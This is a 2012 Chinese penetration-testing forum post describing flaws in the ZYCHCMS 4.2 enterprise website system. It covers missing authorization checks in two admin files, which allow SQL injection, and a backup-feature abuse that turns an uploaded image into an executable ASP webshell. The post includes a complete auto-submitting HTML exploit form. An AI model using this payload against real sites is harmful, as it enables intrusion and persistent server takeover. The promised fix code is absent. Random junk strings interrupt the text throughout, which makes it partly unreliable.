中国网络渗透测试联盟
标题:
ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell
[打印本页]
作者:
admin
时间:
2012-9-10 21:09
标题:
ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell
6 P8 z( ?/ [7 q; R/ I! K
0 I2 D5 J% v0 L( b
" g, t$ t6 y$ F* W/ ?+ h' K8 E5 ~
9 X! R- U0 C& h3 o5 v
影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
9 p9 Q/ A* x; G q; k
①SQL注射漏洞
2 ^" e0 E9 u! A, @9 z @% h# H
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp
3 w2 v$ c2 [6 P) l+ J4 p
漏洞原因:未过滤
* G3 b4 j, X$ X6 b2 A; e( g- I9 z0 ?
漏洞代码:
/ [. o+ z1 A( H( e: L. O6 y1 A
都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。
! ]7 r4 l7 ]& G" a' E2 V( a
修复方法:在文件开头加入代码
0 {9 u+ z9 ?: {% B
7 a! o4 q( S+ p7 c7 {
# h, O6 Q. d" u1 x4 Y- J
②后台拿WBSHELL
* l( e5 \2 e0 e- p3 A1 o3 D( m7 }8 k
进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。
) Z+ S" D, x/ y+ {2 K0 b
这里在网上找了一个,改了下,将就着用。
8 i9 c9 H0 P8 ]: t6 n0 u4 `
以下是代码本地提交代码
9 D5 K+ c5 C' ?$ ^' I1 ^
+ ~8 p7 s+ K- g/ B1 _) X8 h. @8 E
$ H2 y9 _% ^. @. x; ?/ z
<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>
$ h3 D% G: l: D3 U0 N! W7 X) V
<!–eg:
http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup
–>
* d9 a/ S& r+ F- j9 g
<tr>
. O; R4 W9 y. b' K
<td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>
9 u8 e6 R2 j9 k2 {2 i" a; y
</tr>
3 ]5 E4 C7 q; j4 ?; ~! |
<tr>
' L" I! M9 {! a' L. l; t: q
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>
$ p3 @9 X1 h4 O! b7 m3 O
</span>
) B7 c% A; [$ R: v
<table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
1 A" ~6 m$ G" u/ e( H) _2 I
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >
1 |5 ^5 m; F0 c/ f
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>
/ S" Y- d+ I! A1 b
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d
# h; E+ C5 R4 T, U8 u9 o- f/ V
<div align=”left”>
2 y [3 D) i3 Z L" P: }% h0 `: D; W8 @
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
1 A7 n- N" {1 z7 a- T* J
<!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>
F9 A4 R- `* l, |: [
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />
# a- K r8 M' G
</div></td>
1 p: {3 L& m1 G' e0 a
</tr>
' n0 t8 Y# E2 ]' [0 \" y. }0 c
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>
# x( K% z% O3 ^. C
<td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
% J9 y1 P, {; [
<td class=”td”><div align=”left”>
1 F- S0 b! |+ d# [5 y9 B
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
) x6 G, }- W, k1 [
[如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
) V0 z* o9 |. a% _8 B( h( x7 \
</tr>
- S( ?4 c8 G6 N4 y9 T! ^
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>
3 h( I X. V- F, V- k4 Q. W* E; G; h
<td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
* v9 `' Z7 v" k. U8 _; Q! @6 c) V( O
<td class=”td”><div align=”left”>
+ B+ {- M6 y( Y: V$ [
<input type=”submit” value=”确定备份” class=”btn”
: M/ C/ M$ K$ q1 _4 K( H$ r
</div></td>
$ l( S1 S" I! r
</tr>
+ K* {7 X. K2 b K2 S6 r
</table></td></tr></form>
( X' T$ G' G$ t5 Z; j9 _0 v
</table>
5 m! M8 }/ t- W
</td>
" A" Q* ?/ V% w# U- _0 e! U1 @* r
</tr>
" _0 ]6 |4 B) h0 K; t5 |5 ~4 j
</table>
. X4 I+ H; l1 E X' p- \
<script>
- p0 C) ~3 @8 T6 v
document.all.add.submit();
" {8 z$ ?' @$ g- `* k1 l+ b: E
</script>
* ^/ [0 T( T9 ?
* y0 Q8 g2 H- S% T( m
2 {: D" I4 B s( j/ N6 k
5 i. f4 A) W( i ^
( I7 W8 D% y- n* u+ C
; E; K0 S2 w6 z6 o
' f0 X3 V! y$ f% I
& N6 e# M) ` b- @# M+ g# n
7 m2 t0 A$ X% m% h z9 \9 }
, i& i3 t. o# g
0 |( p2 P/ o) H
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2